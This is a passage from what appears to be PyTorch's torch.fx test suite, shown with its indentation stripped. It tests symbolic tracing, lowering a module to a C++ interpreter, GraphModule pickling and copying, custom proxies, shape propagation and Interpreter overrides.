raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
            # 3) Returns the specified return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_trace_buffer_slice(self):
bs, d_hid = 10, 23
class ExampleCode(torch.nn.Module):
def __init__(self):
super().__init__()
self.mm_param = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.mm_param2 = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.lin = torch.nn.Linear(d_hid, d_hid)
self.register_buffer('buffer', torch.randn(bs + 100, d_hid))
def forward(self, x):
x = torch.mm(x, self.mm_param)
skip_connection = x
x = torch.relu(x)
x = torch.mm(x, self.mm_param) + self.buffer[:x.shape[0]]
x = self.lin(x)
x = torch.relu(x)
x = x + skip_connection
x = torch.mm(x, self.mm_param2)
x = self.lin(x)
return x
ec = ExampleCode()
traced = torch.fx.symbolic_trace(ec)
x = torch.randn(bs, d_hid)
torch.testing.assert_allclose(ec(x), traced(x))
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in traced.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Size] = None
output_stride : Optional[Tuple[int, ...]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propagation and make sure the results match the actual output
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
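# The leaf submodule returns a (int, Tensor) tuple, so the tensor_meta
# recorded for the call_module node should mirror that aggregate structure.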
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
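# Override call_function/call_method to swap sigmoid and neg at execution
# time; the traced graph itself is left unmodified.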
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
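# Pre-populate the result of the 'linear' call_module node via initial_env;
# the Interpreter uses the cached value instead of executing that node and
# feeds it into the downstream clamp.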
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
